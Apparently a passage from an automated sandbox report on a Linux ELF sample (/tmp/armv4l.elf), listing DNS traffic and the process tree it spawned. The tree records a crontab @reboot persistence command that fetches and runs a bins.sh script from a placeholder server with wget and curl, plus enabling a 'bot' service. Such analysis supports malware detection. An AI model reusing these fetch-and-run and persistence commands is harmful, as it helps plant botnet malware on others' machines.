Nov 20, 2024 01:01:28.685604095 CET | 192.168.2.14 | 8.8.8.8 | 0x3e16 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 01:01:28.685656071 CET | 192.168.2.14 | 8.8.8.8 | 0x925e | Standard query (0) | 28 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:23.465831995 CET | 1.1.1.1 | 192.168.2.14 | 0xfe1 | No error (0) | 172.111.38.48 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 01:01:29.129717112 CET | 8.8.8.8 | 192.168.2.14 | 0x3e16 | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 01:01:29.129717112 CET | 8.8.8.8 | 192.168.2.14 | 0x3e16 | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 00:01:18 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | /tmp/armv4l.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:18 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:18 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:23 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/armv4l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:25 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 00:01:26 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 00:01:26 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |